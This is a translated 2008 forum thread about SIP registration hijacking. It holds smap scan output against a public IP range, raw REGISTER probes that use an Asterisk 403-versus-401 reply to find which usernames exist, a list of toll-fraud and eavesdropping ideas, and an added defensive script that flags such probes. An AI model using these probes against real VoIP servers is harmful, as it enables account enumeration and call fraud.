Hacker's Defense (黑客防线): seeking breakthroughs in the unity of opposites between attack and defense! A professional hacking-technology journal founded in 2001!

Posted by funhoo (regular user, registered 2008-06-17)
[Recommended] The Identity Theft attack in Registration hijacking
First of all, we must master SIP banner grabbing; SMAP can perform SIP discovery:
$ ./smap -o 89.53.17.208/29
smap 0.4.0-cvs <hscholz@raisdorf.net>http://www.wormulon.net/
Host 89.53.17.208:5060: (ICMP OK) SIP timeout
Host 89.53.17.209:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.210:5060: (ICMP timeout) SIP timeout
Host 89.53.17.211:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.212:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.213:5060: (ICMP timeout) SIP enabled
Siemens SX541 (firmware 1.67)
Host 89.53.17.214:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon Series firmware: 14.03.(89|90) (Oct 28 2005)
Host 89.53.17.215:5060: (ICMP OK) SIP enabled
AVM FRITZ!Box Fon ata 11.03.45
8 hosts scanned, 6 ICMP reachable, 6 SIP enabled
$
As for attacks on SIP, I will mainly discuss Identity Theft (identity hijacking) within the Registration hijacking category. Public carriers face much tougher challenges than PSTN and mesh-network operators when it comes to validating identity and endpoints in VoIP deployments, because an endpoint's IP address is usually not validated at the Internet ingress point, and, unlike public telephone numbers, there is as yet no effective, widely deployed way for a VoIP carrier to prove a SIP identity. A typical SIP REGISTER call thus flows from a phone to a registrar or proxy.
With the SIP Express Router at 192.168.1.104, let's look at this example:
Sent to 192.168.1.104:
REGISTER sip:192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:5060;rport;branch=z9hG4bK9AE42E04481647949E19C9C281BD7CDC
From: 506 <sip:506@192.168.1.104>;tag=120975822
To: 506 <sip:506@192.168.1.104>
Contact: "506" <sip:506@192.168.1.120:5060>
Call-ID: 9F7F6FB9AFFA47278BE3CB571B3744D9@192.168.1.104
CSeq: 54512 REGISTER
Expires: 1800
Max-Forwards: 70
User-Agent: X-Lite release 1105x
Content-Length: 0

Received from 192.168.1.104:
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.120:5060;rport=5060;branch=z9hG4bK9AE42E04481647949E19C9C281BD7CDC
From: 506 <sip:506@192.168.1.104>;tag=120975822
To: 506 <sip:506@192.168.1.104>;tag=b27e1a1d33761e85846fc98f5f3a7e58.bdc9
Call-ID: 9F7F6FB9AFFA47278BE3CB571B3744D9@192.168.1.104
CSeq: 54512 REGISTER
WWW-Authenticate: Digest realm="domain2", nonce="440bcbe24670d5d0448fd78ec4b672a3c29de346"
Server: Sip EXpress router (0.9.6 (i386/linux))
Content-Length: 0
Warning: 392 192.168.1.104:5060 "Noisy feedback tells: pid=29785 req_src_ip=192.168.1.120 req_src_port=5060 in_uri=sip:192.168.1.104 out_uri=sip:192.168.1.104 via_cnt==1"
// Here we received the expected 401 SIP response; next we switch to a wrong username and carry out the hijack
Sent to 192.168.1.104:
REGISTER sip:thisisthecanary@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:2174;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.104>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.104>
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
Contact: <sip:test@192.168.1.120:2174>
Max_forwards: 70
User Agent: SIPSCAN 1.0
Content-Type: application/sdp
Subject: SIPSCAN Probe
Expires: 7200
Content-Length: 0

Received from 192.168.1.104:
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.120:2174;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.104>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.104>;tag=b27e1a1d33761e85846fc98f5f3a7e58.b11e
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
WWW-Authenticate: Digest realm="domain2", nonce="440bc944e0e0dc62d7185d035576505481d9dd34"
Server: Sip EXpress router (0.9.6 (i386/linux))
Content-Length: 0
Warning: 392 192.168.1.104:5060 "Noisy feedback tells: pid=29782 req_src_ip=192.168.1.120 req_src_port=2174 in_uri=sip:thisisthecanary@192.168.1.104 out_uri=sip:thisisthecanary@192.168.1.104 via_cnt==1"
// The username thisisthecanary also received the same 401 SIP response as before; now we send the same requests to the Asterisk server (192.168.1.103)
Sent to 192.168.1.103:
REGISTER sip:192.168.1.103 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.21:2051;branch=z9hG4bK-v7brim4vvk49;rport
From: "Snom 320" <sip:201@192.168.1.103>;tag=e35li4iydd
To: "Snom 320" <sip:201@192.168.1.103>
Call-ID: 3c2670092710-g9u6jfnehewi@snom320
CSeq: 1 REGISTER
Max-Forwards: 70
Contact: <sip:201@192.168.1.21:2051;line=ylcbbss9>;q=1.0;+sip.instance="<urn:uuid:bf9b2fe3-b95c-4cfd-96ad-5b52bf1d0c2a>";audio;mobility="fixed";duplex="full";description="snom320";actor="principal";events="dialog";methods="INVITE,ACK,CANCEL,BYE,REFER,OPTIONS,NOTIFY,SUBSCRIBE,PRACK,MESSAGE,INFO"
User-Agent: snom320/4.1
Supported: gruu
Allow-Events: dialog
X-Real-IP: 192.168.1.21
WWW-Contact: <http://192.168.1.21:80>;
WWW-Contact: <https://192.168.1.21:443>
Expires: 3600
Content-Length: 0

Received from 192.168.1.103:
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.21:2051;branch=z9hG4bK-v7brim4vvk49
From: "Snom 320" <sip:201@192.168.1.103>;tag=e35li4iydd
To: "Snom 320" <sip:201@192.168.1.103>;tag=as356abebc
Call-ID: 3c2670092bf2-g9u6jfnehewi@snom320
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER
Contact: <sip:201@192.168.1.103>
WWW-Authenticate: Digest realm="asterisk", nonce="38e8e429"
// Hijacking attempt against the Asterisk server with the wrong username thisisthecanary
REGISTER sip:thisisthecanary@192.168.1.103 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:2219;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.103>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.103>
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
Contact: <sip:test@192.168.1.120:2219>
Max_forwards: 70
User Agent: SIPSCAN 1.0
Content-Type: application/sdp
Subject: SIPSCAN Probe
Expires: 7200
Content-Length: 0

Received from 192.168.1.103:
SIP/2.0 403 Forbidden
Via: SIP/2.0/UDP 192.168.1.120:2219;branch=el7mCh5QhC6WNg
From: test <sip:thisisthecanary@192.168.1.103>;tag=vkffYiKFjn
To: test <sip:thisisthecanary@192.168.1.103>;tag=as44107711
Call-ID: AXy1SAVzvwd9@192.168.1.120
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER
Contact: <sip:thisisthecanary@192.168.1.103>
Content-Length: 0
At this point we can see that with a wrong username we received a 403 Forbidden SIP response instead of the correct 401 response to REGISTER. Sending large volumes of SIP call-signaling messages (such as INVITE, REGISTER, BYE, or RTP media-stream packets) to a target VoIP server degrades service, forces calls to drop prematurely, and leaves some VoIP devices unable to handle calls at all; this style of identity hijacking is fairly common.

Today, SIP and RTP do not encrypt call-signaling packets or the voice stream, so with LAN and WLAN traffic-capture tools (sniffers) one can obtain the caller's identity, credentials and SIP URI (phone number). Such weaknesses can be exploited to launch all kinds of attacks. For instance, once we have compromised a gateway, IP phones can place calls at will without authentication; an attacker can use the harvested account details to impersonate the user to a customer representative or a self-service portal and then change the calling plan, enabling calls to 900 numbers or to previously blocked international numbers. Unprotected voice calls can be intercepted and eavesdropped on, and can be cut off at any time. With a redirection attack we can replace the voicemail address with an IP address of our choosing, opening a covert channel and a backdoor for ourselves. Most typically, we can get around SIP and IP-address restrictions to steal an entire conversation, access voicemail, or change call-forwarding numbers. Financially motivated attackers can also capture voice calls and replay them to obtain sensitive business or private information.
The SUCK-O community is the hacker group ranked first in the world on the progenic chart; it is headquartered in Germany, and the technical level within the community is internationally leading. Everyone is welcome to exchange techniques with us.

Discussion group 5873047

2008-6-19 5:47:10
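The captures in the post above show two registrars answering a REGISTER for an unknown username differently: SER challenges with 401 either way, while Asterisk answers 403, which tells the sender whether an account exists. The following Python script is an added example written for this page, not code from the post or from any tool named in it. It parses a transcript in the post's "Sent to"/"Received from" layout and reports, from the operator's side, (a) registrars whose REGISTER response code depends on the username and (b) source IPs that register as several identities or send a scanner User-Agent. The transcript is constructed to mirror the post's captures with trimmed header sets; the threshold and the scanner list are assumptions for the demo, while `alwaysauthreject` is a real Asterisk sip.conf option.

```python
"""Operator-side reading of the REGISTER probes in the post above: an added
illustration, not the post's code.  Transcript constructed, headers trimmed."""
import re
from collections import defaultdict

# Constructed: 506 exists on the SER host (.104), 201 on the Asterisk host
# (.103), "thisisthecanary" on neither.  Responses keep only what is checked.
TRANSCRIPT = """\
Sent to 192.168.1.104:
REGISTER sip:192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:5060;rport;branch=z9hG4bK1
From: 506 <sip:506@192.168.1.104>;tag=a1

Received from 192.168.1.104:
SIP/2.0 401 Unauthorized
WWW-Authenticate: Digest realm="domain2", nonce="440bcbe24670d5d0"

Sent to 192.168.1.104:
REGISTER sip:thisisthecanary@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:2174;branch=el7mCh5Q
From: test <sip:thisisthecanary@192.168.1.104>;tag=b1
User-Agent: SIPSCAN 1.0

Received from 192.168.1.104:
SIP/2.0 401 Unauthorized

Sent to 192.168.1.103:
REGISTER sip:192.168.1.103 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.21:2051;branch=z9hG4bK-v7
From: "Snom 320" <sip:201@192.168.1.103>;tag=e35

Received from: 192.168.1.103
SIP/2.0 401 Unauthorized

Sent to 192.168.1.103:
REGISTER sip:thisisthecanary@192.168.1.103 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.120:2219;branch=el7mCh5Q
From: test <sip:thisisthecanary@192.168.1.103>;tag=b2
User-Agent: SIPSCAN 1.0

Received from 192.168.1.103:
SIP/2.0 403 Forbidden
"""
# Scanner User-Agent fragments: SIPSCAN from the post; "friendly-scanner" is
# the SIPVicious default.
SCANNER_UA = ("sipscan", "friendly-scanner")
USER_RE = re.compile(r"sip:([^@>;\s]+)@")  # user part of a SIP URI
IP_RE = re.compile(r"\d+\.\d+\.\d+\.\d+")   # first dotted quad in a string

def parse_message(text):
    """Start line plus headers; header names are lower-cased for lookup."""
    lines = text.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    msg = {"headers": headers}
    m = re.match(r"SIP/2\.0 (\d{3})", lines[0])
    if m:
        msg["status"] = int(m.group(1))
    else:
        msg["method"] = lines[0].split(" ")[0]
    return msg

def parse_transcript(text):
    """Split 'Sent to'/'Received from' blocks into (request, response) pairs."""
    msgs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        direction, _, body = block.partition("\n")
        msg = parse_message(body)
        msg["peer"] = IP_RE.search(direction).group(0)
        msgs.append(msg)
    return list(zip(msgs[0::2], msgs[1::2]))

def leaky_registrars(pairs):
    """Registrars whose REGISTER response code depends on the username.
    Challenging every REGISTER with 401, known user or not, closes this
    oracle (Asterisk: alwaysauthreject=yes in sip.conf)."""
    codes = defaultdict(dict)  # registrar -> username -> status code
    for req, resp in pairs:
        if req.get("method") == "REGISTER" and "status" in resp:
            user = USER_RE.search(req["headers"].get("from", "")).group(1)
            codes[req["peer"]][user] = resp["status"]
    return {srv: by for srv, by in codes.items() if len(set(by.values())) > 1}

def suspicious_sources(pairs, max_users=1):
    """Source IPs that register as several identities or use a scanner UA."""
    seen = defaultdict(lambda: {"users": set(), "scanner_ua": set()})
    for req, _ in pairs:
        if req.get("method") != "REGISTER":
            continue
        h = req["headers"]
        src = IP_RE.search(h.get("via", "")).group(0)  # first Via hop
        seen[src]["users"].add(USER_RE.search(h.get("from", "")).group(1))
        if any(s in h.get("user-agent", "").lower() for s in SCANNER_UA):
            seen[src]["scanner_ua"].add(h["user-agent"])
    return {ip: r for ip, r in seen.items()
            if len(r["users"]) > max_users or r["scanner_ua"]}
```

Calling `leaky_registrars(parse_transcript(TRANSCRIPT))` reports only 192.168.1.103, the Asterisk host, because its answer changed from 401 to 403 between a known and an unknown username; `suspicious_sources` reports 192.168.1.120 both for the SIPSCAN User-Agent and for registering as two different identities, while the Snom phone at 192.168.1.21 is left alone. To use it on a real capture, replace TRANSCRIPT with text exported in the same layout.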
Posted by halidome (regular user, registered 2008-03-25)
Re: [Recommended] The Identity Theft attack in Registration hijacking
Too much.
2008-8-29 19:59:51